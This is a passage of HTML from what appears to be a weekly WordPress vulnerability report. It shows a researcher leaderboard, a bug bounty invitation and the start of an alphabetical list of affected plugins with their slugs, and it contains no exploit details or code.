					<img decoding="async" src="https://www.gravatar.com/avatar/ae8de8c9cbdc17ec01dd57c487e7cd37.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ae8de8c9cbdc17ec01dd57c487e7cd37"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/qdtad" target="_blank" rel="noopener">qdtad</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/2a1b4c1c638eb4f66b0677e71058a830.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2a1b4c1c638eb4f66b0677e71058a830"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/0xd4rk5id3" target="_blank" rel="noopener">0xd4rk5id3</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/f8da36de0b16927a052e4eb0878abbfb.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f8da36de0b16927a052e4eb0878abbfb"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ly-hoang" target="_blank" rel="noopener">lhking</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/481fa218340879c2506f5e4884abc1f0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="481fa218340879c2506f5e4884abc1f0"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vunbt" target="_blank" rel="noopener">VuNBT</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/bd7e0df88698258ec0187a7b262a69d7.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="bd7e0df88698258ec0187a7b262a69d7"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/duna" target="_blank" rel="noopener">duna</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/6a25a9f7c7f7197d7cbb58738efd41ef.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6a25a9f7c7f7197d7cbb58738efd41ef"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/james-paremain" target="_blank" rel="noopener">James Paremain</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/08527e440d77f24880a4d8811a7f8d7d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="08527e440d77f24880a4d8811a7f8d7d"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/a1" target="_blank" rel="noopener">san6051</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/ee735beacaf16f47977b30dfa415ca5b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ee735beacaf16f47977b30dfa415ca5b"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/aeonrisk" target="_blank" rel="noopener">AeonRisk</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/64cf1475dedd021651902db53af18364.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="64cf1475dedd021651902db53af18364"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jonah-burgess" target="_blank" rel="noopener">Jonah Burgess (CryptoCat)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/6a3af1646bf6ea9898660cdc61712f13.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6a3af1646bf6ea9898660cdc61712f13"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/levon-balyan" target="_blank" rel="noopener">Levon Balyan</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/cacf4ee88693364dcf8ccac51b575d6b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="cacf4ee88693364dcf8ccac51b575d6b"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luis-koleski" target="_blank" rel="noopener">Luis Koleski</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/2127a5367121b7fc0cae0ac782c9baf1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2127a5367121b7fc0cae0ac782c9baf1"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/longnv719" target="_blank" rel="noopener">longnv719</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/64a0165f9a088bbcf2fc9efe7719419b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="64a0165f9a088bbcf2fc9efe7719419b"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-hung" target="_blank" rel="noopener">bashu</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/3a44d04cdd3490b305d8f18cf157f1fd.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3a44d04cdd3490b305d8f18cf157f1fd"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/robert-hartinger" target="_blank" rel="noopener">Robert Hartinger</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
</table>
<p><em>Are you a security researcher who would like to be featured in our weekly vulnerability report?</em> You can responsibly disclose your WordPress vulnerability discoveries to us and earn a bounty on in-scope vulnerabilities <a href="https://www.wordfence.com/threat-intel/vulnerabilities/submit/" target="_blank" rel="noopener">through our Bug Bounty Program</a>. Responsibly disclosing your vulnerability discoveries to us will also get your name added on the <a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/" target="_blank" rel="noopener">Wordfence Intelligence leaderboard</a> along with being mentioned in our weekly vulnerability report.</p>
<hr>
<h3>WordPress Plugins with Reported Vulnerabilities Last Week</h3>
</p>
<table class="wfvr-list-table software-list">
<tr>
<th class="text-center w-50">Software Name</th>
<th class="text-center">Software Slug</th>
</tr>
<tr>
<td>Abandoned Cart Lite for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-abandoned-cart" target="_blank" rel="noopener">woocommerce-abandoned-cart</a>
		</td>
</tr>
<tr>
<td>Accept Donations with PayPal &amp; Stripe</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-paypal-donation" target="_blank" rel="noopener">easy-paypal-donation</a>
		</td>
</tr>
<tr>
<td>Advanced Views – Display Custom Fields (ACF, Pods, MetaBox), Posts, CPT and Woo Products anywhere in Gutenberg, Elementor, Divi, Beaver…</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/acf-views" target="_blank" rel="noopener">acf-views</a>
		</td>
</tr>
<tr>
<td>AffiliateWP</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/affiliate-wp" target="_blank" rel="noopener">affiliate-wp</a>
		</td>
</tr>
<tr>
<td>AffiliateX – Amazon Affiliate Plugin, Product Boxes, Comparison Tables &amp; Affiliate Link Tracking</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/affiliatex" target="_blank" rel="noopener">affiliatex</a>
		</td>
</tr>
<tr>
<td>AI Copilot – Content Generator</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ai-copilot-content-generator" target="_blank" rel="noopener">ai-copilot-content-generator</a>
		</td>
</tr>
<tr>
<td>Appointment Hour Booking – Booking Calendar</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/appointment-hour-booking" target="_blank" rel="noopener">appointment-hour-booking</a>
		</td>
</tr>
<tr>
<td>ARforms</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/arforms" target="_blank" rel="noopener">arforms</a>
		</td>
</tr>
<tr>
<td>Avada Core</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fusion-core" target="_blank" rel="noopener">fusion-core</a>
		</td>
</tr>
<tr>
<td>Avada Custom Branding</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fusion-white-label-branding" target="_blank" rel="noopener">fusion-white-label-branding</a>
		</td>
</tr>
<tr>
<td>AWP Classifieds</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/another-wordpress-classifieds-plugin" target="_blank" rel="noopener">another-wordpress-classifieds-plugin</a>
		</td>
</tr>
<tr>
<td>BetterDocs –  AI Documentation, Knowledge Base, Docs, Wikis, FAQ with Chatbot</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/betterdocs" target="_blank" rel="noopener">betterdocs</a>
		</td>
</tr>
<tr>
<td>Booking and Rental Manager for Bike | Car | Resort | Appointment | Dress | Equipment</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/booking-and-rental-manager-for-woocommerce" target="_blank" rel="noopener">booking-and-rental-manager-for-woocommerce</a>
		</td>
</tr>
<tr>
<td>Brands for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/brands-for-woocommerce" target="_blank" rel="noopener">brands-for-woocommerce</a>
		</td>
</tr>
<tr>
<td>Broadcast Live Video – Live Streaming : WebRTC, HLS, RTSP, RTMP</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/videowhisper-live-streaming-integration" target="_blank" rel="noopener">videowhisper-live-streaming-integration</a>
		</td>
</tr>
<tr>
<td>BSK PDF Manager</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bsk-pdf-manager" target="_blank" rel="noopener">bsk-pdf-manager</a>
		</td>
</tr>
<tr>
<td>Bulk Page Generator – LPagery</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/lpagery" target="_blank" rel="noopener">lpagery</a>
		</td>
</tr>
<tr>
<td>Byteflows Travel &amp; Hotel Booking</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/byteflows-travel-hotel-booking" target="_blank" rel="noopener">byteflows-travel-hotel-booking</a>
		</td>
</tr>
<tr>
<td>Checkout Field Editor for WooCommerce (Pro)</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-checkout-field-editor-pro" target="_blank" rel="noopener">woocommerce-checkout-field-editor-pro</a>
		</td>
</tr>
<tr>
<td>Civi Framework</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/civi-framework" target="_blank" rel="noopener">civi-framework</a>
		</td>
</tr>
<tr>
<td>CoCart – Headless REST API for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cart-rest-api-for-woocommerce" target="_blank" rel="noopener">cart-rest-api-for-woocommerce</a>
		</td>
</tr>
<tr>
<td>Complianz – GDPR/CCPA Cookie Consent</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/complianz-gdpr" target="_blank" rel="noopener">complianz-gdpr</a>
		</td>
</tr>
<tr>
<td>Contact Form 7 – Dynamic Text Extension</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/contact-form-7-dynamic-text-extension" target="_blank" rel="noopener">contact-form-7-dynamic-text-extension</a>
		</td>
</tr>
<tr>
<td>Content Control – The Ultimate Content Restriction Plugin! Restrict Content, Create Conditional Blocks &amp; More</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/content-control" target="_blank" rel="noopener">content-control</a>
		</td>
</tr>
<tr>
<td>Cozy Blocks – Page Builder for Gutenberg Editor &amp; FSE with 600+ Patterns, 58 Blocks &amp; Templates</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cozy-addons" target="_blank" rel="noopener">cozy-addons</a>
		</td>
</tr>
<tr>
<td>Create</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mediavine-create" target="_blank" rel="noopener">mediavine-create</a>
		</td>
</tr>
<tr>
<td>Custom links in Elementor Image Carousel</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/custom-links-in-elementor-image-carousel" target="_blank" rel="noopener">custom-links-in-elementor-image-carousel</a>
		</td>
</tr>
<tr>
<td>Customer Support Ticket System &amp; Helpdesk</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-ticket" target="_blank" rel="noopener">wp-ticket</a>
		</td>
</tr>
<tr>
<td>Cyr to Lat Reloaded – Transliteration of Links and File Names</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cyr-and-lat" target="_blank" rel="noopener">cyr-and-lat</a>
		</td>
</tr>
<tr>
<td>Directory Listings WordPress plugin – uListing</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ulisting" target="_blank" rel="noopener">ulisting</a>
		</td>
</tr>
<tr>
<td>Ditty – Responsive News Tickers, Sliders, and Lists</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ditty-news-ticker" target="_blank" rel="noopener">ditty-news-ticker</a>
		</td>
</tr>
<tr>
<td>Dokan Pro</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/dokan-pro" target="_blank" rel="noopener">dokan-pro</a>
		</td>
</tr>
<tr>
<td>Dynamic Pricing With Discount Rules for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/aco-woo-dynamic-pricing" target="_blank" rel="noopener">aco-woo-dynamic-pricing</a>
		</td>
</tr>
<tr>
<td>Easy Appointments</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-appointments" target="_blank" rel="noopener">easy-appointments</a>
		</td>
</tr>
<tr>
<td>Easy Digital Downloads – eCommerce Payments and Subscriptions made easy</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-digital-downloads" target="_blank" rel="noopener">easy-digital-downloads</a>
		</td>
</tr>
<tr>
<td>Easy Form Builder by WhiteStudio – Drag &amp; Drop Form Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-form-builder" target="_blank" rel="noopener">easy-form-builder</a>
		</td>
</tr>
<tr>
<td>Ebook Store</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ebook-store" target="_blank" rel="noopener">ebook-store</a>
		</td>
</tr>
<tr>
<td>Equalize Digital Accessibility Checker – WCAG, ADA, EAA and Section 508 compliance</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/accessibility-checker" target="_blank" rel="noopener">accessibility-checker</a>
		</td>
</tr>
<tr>
<td>eRoom – Webinar &amp; Meeting Plugin for Zoom, Google Meet, Microsoft Teams</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/eroom-zoom-meetings-webinar" target="_blank" rel="noopener">eroom-zoom-meetings-webinar</a>
		</td>
</tr>
<tr>
<td>Essential Addons for Elementor – Popular Elementor Templates &amp; Widgets</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/essential-addons-for-elementor-lite" target="_blank" rel="noopener">essential-addons-for-elementor-lite</a>
		</td>
</tr>
<tr>
<td>Event Post</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/event-post" target="_blank" rel="noopener">event-post</a>
		</td>
</tr>
<tr>
<td>Event Tickets and Registration</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/event-tickets" target="_blank" rel="noopener">event-tickets</a>
		</td>
</tr>
<tr>
<td>EventON Action User</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/eventon-action-user" target="_blank" rel="noopener">eventon-action-user</a>
		</td>
</tr>
<tr>
<td>Events Made Easy</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/events-made-easy" target="_blank" rel="noopener">events-made-easy</a>
		</td>
</tr>
<tr>
<td>Falcon – WordPress Optimizations &amp; Tweaks</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/falcon" target="_blank" rel="noopener">falcon</a>
		</td>
</tr>
<tr>
<td>Firelight Lightbox</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-fancybox" target="_blank" rel="noopener">easy-fancybox</a>
		</td>
</tr>
<tr>
<td>Flipbook PDF Viewer &amp; Embedder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/pdf-embed-viewer" target="_blank" rel="noopener">pdf-embed-viewer</a>
		</td>
</tr>
<tr>
<td>Fluent Forms Pro Add On Pack</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fluentformpro" target="_blank" rel="noopener">fluentformpro</a>
		</td>
</tr>
<tr>
<td>Fluent Support – Helpdesk &amp; Customer Support Ticket System</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fluent-support" target="_blank" rel="noopener">fluent-support</a>
		</td>
</tr>
<tr>
<td>FormCraft</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/formcraft3" target="_blank" rel="noopener">formcraft3</a>
		</td>
</tr>
<tr>
<td>GamiPress – Gamification plugin to reward points, achievements, badges &amp; ranks in WordPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gamipress" target="_blank" rel="noopener">gamipress</a>
		</td>
</tr>
<tr>
<td>GiveWP – Donation Plugin and Fundraising Platform</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/give" target="_blank" rel="noopener">give</a>
		</td>
</tr>
<tr>
<td>GoDAM – Organize WordPress Media Library &amp; File Manager with Unlimited Folders for Images, Videos &amp; more</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/godam" target="_blank" rel="noopener">godam</a>
		</td>
</tr>
<tr>
<td>Graphina – Charts and Graphs For Elementor</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/graphina-elementor-charts-and-graphs" target="_blank" rel="noopener">graphina-elementor-charts-and-graphs</a>
		</td>
</tr>
<tr>
<td>Grid/List View for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gridlist-view-for-woocommerce" target="_blank" rel="noopener">gridlist-view-for-woocommerce</a>
		</td>
</tr>
<tr>
<td>GutenKit – Page Builder Blocks, Patterns, and Templates for Gutenberg Block Editor</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gutenkit-blocks-addon" target="_blank" rel="noopener">gutenkit-blocks-addon</a>
		</td>
</tr>
<tr>
<td>HashThemes Demo Importer</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hashthemes-demo-importer" target="_blank" rel="noopener">hashthemes-demo-importer</a>
		</td>
</tr>
<tr>
<td>Header Footer Script Adder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/header-and-footer-script-adder" target="_blank" rel="noopener">header-and-footer-script-adder</a>
		</td>
</tr>
<tr>
<td>Hubbub Lite – Fast, free social sharing and follow buttons</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/social-pug" target="_blank" rel="noopener">social-pug</a>
		</td>
</tr>
<tr>
<td>JetBooking</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jet-booking" target="_blank" rel="noopener">jet-booking</a>
		</td>
</tr>
<tr>
<td>JetElements</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jet-elements" target="_blank" rel="noopener">jet-elements</a>
		</td>
</tr>
<tr>
<td>JetEngine</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jet-engine" target="_blank" rel="noopener">jet-engine</a>
		</td>
</tr>
<tr>
<td>Kali Forms — Contact Form &amp; Drag-and-Drop Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kali-forms" target="_blank" rel="noopener">kali-forms</a>
		</td>
</tr>
<tr>
<td>Kirki – Freeform Page Builder, Website Builder &amp; Customizer</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kirki" target="_blank" rel="noopener">kirki</a>
		</td>
</tr>
<tr>
<td>Kit (formerly ConvertKit) – Email Newsletter, Email Marketing, Membership, Subscribers and Landing Pages</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/convertkit" target="_blank" rel="noopener">convertkit</a>
		</td>
</tr>
<tr>
<td>Knit Pay – Cashfree, Instamojo, Razorpay, PayPal and more</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/knit-pay" target="_blank" rel="noopener">knit-pay</a>
		</td>
</tr>
<tr>
<td>Kwayy HTML Sitemap</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kwayy-html-sitemap" target="_blank" rel="noopener">kwayy-html-sitemap</a>
		</td>
</tr>
<tr>
<td>LA-Studio Element Kit for Elementor</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/lastudio-element-kit" target="_blank" rel="noopener">lastudio-element-kit</a>
		</td>
</tr>
<tr>
<td>License Manager for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/license-manager-for-woocommerce" target="_blank" rel="noopener">license-manager-for-woocommerce</a>
		</td>
</tr>
<tr>
<td>LIQUID SPEECH BALLOON</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/liquid-speech-balloon" target="_blank" rel="noopener">liquid-speech-balloon</a>
		</td>
</tr>
<tr>
<td>ListingPro Plugin</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/listingpro-plugin" target="_blank" rel="noopener">listingpro-plugin</a>
		</td>
</tr>
<tr>
<td>Machete</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/machete" target="_blank" rel="noopener">machete</a>
		</td>
</tr>
<tr>
<td>MailPoet – Newsletters, Email Marketing, and Automation</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mailpoet" target="_blank" rel="noopener">mailpoet</a>
		</td>
</tr>
<tr>
<td>Mailster WordPress Newsletter Plugin</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mailster" target="_blank" rel="noopener">mailster</a>
		</td>
</tr>
<tr>
<td>MapPress – Google Maps, OpenStreetMap &amp; Leaflet</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mappress-google-maps-for-wordpress" target="_blank" rel="noopener">mappress-google-maps-for-wordpress</a>
		</td>
</tr>
<tr>
<td>MapSVG</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mapsvg" target="_blank" rel="noopener">mapsvg</a>
		</td>
</tr>
<tr>
<td>MapSVG – Vector maps, Image maps, Google Maps</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mapsvg-lite-interactive-vector-maps" target="_blank" rel="noopener">mapsvg-lite-interactive-vector-maps</a>
		</td>
</tr>
<tr>
<td>MarketKing — Ultimate WooCommerce Multivendor Marketplace Solution</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/marketking-multivendor-marketplace-for-woocommerce" target="_blank" rel="noopener">marketking-multivendor-marketplace-for-woocommerce</a>
		</td>
</tr>
<tr>
<td>Masteriyo LMS – LMS Course Builder, Quizzes &amp; Certificates</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learning-management-system" target="_blank" rel="noopener">learning-management-system</a>
		</td>
</tr>
<tr>
<td>MDJM Event Management</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mobile-dj-manager" target="_blank" rel="noopener">mobile-dj-manager</a>
		</td>
</tr>
<tr>
<td>Mediavine Control Panel</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mediavine-control-panel" target="_blank" rel="noopener">mediavine-control-panel</a>
		</td>
</tr>
<tr>
<td>miniOrange Discord Integration</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/miniorange-discord-integration" target="_blank" rel="noopener">miniorange-discord-integration</a>
		</td>
</tr>
<tr>
<td>miniOrange Social Login and Register (Discord, Google, Twitter, LinkedIn) Pro Addon</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/miniorange-login-openid-2" target="_blank" rel="noopener">miniorange-login-openid</a>
		</td>
</tr>
<tr>
<td>Modula Image Gallery – Photo Grid &amp; Video Gallery</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/modula-best-grid-gallery" target="_blank" rel="noopener">modula-best-grid-gallery</a>
		</td>
</tr>
<tr>
<td>MountDev AI MCP Connector for WordPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mountdev-ai-mcp-connector" target="_blank" rel="noopener">mountdev-ai-mcp-connector</a>
		</td>
</tr>
<tr>
<td>MP3 Audio Player – Music Player, Podcast Player &amp; Radio by Sonaar</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mp3-music-player-by-sonaar" target="_blank" rel="noopener">mp3-music-player-by-sonaar</a>
		</td>
</tr>
<tr>
<td>Nexter Blocks – Gutenberg Blocks, Page Builder &amp; AI Website Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/the-plus-addons-for-block-editor" target="_blank" rel="noopener">the-plus-addons-for-block-editor</a>
		</td>
</tr>
<tr>
<td>Ninja Forms – The Contact Form Builder That Grows With You</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ninja-forms" target="_blank" rel="noopener">ninja-forms</a>
		</td>
</tr>
<tr>
<td>Ninja Tables – Easy Data Table Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ninja-tables" target="_blank" rel="noopener">ninja-tables</a>
		</td>
</tr>
<tr>
<td>Open User Map – Interactive Leaflet Maps</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/open-user-map" target="_blank" rel="noopener">open-user-map</a>
		</td>
</tr>
<tr>
<td>Orbit Fox: Duplicate Page, Menu Icons, SVG Support, Cookie Notice, Custom Fonts &amp; More</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/themeisle-companion" target="_blank" rel="noopener">themeisle-companion</a>
		</td>
</tr>
<tr>
<td>Paid Membership Subscriptions – Effortless Memberships, Recurring Payments &amp; Content Restriction</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/paid-member-subscriptions" target="_blank" rel="noopener">paid-member-subscriptions</a>
		</td>
</tr>
<tr>
<td>Participants Database</td>
<td>
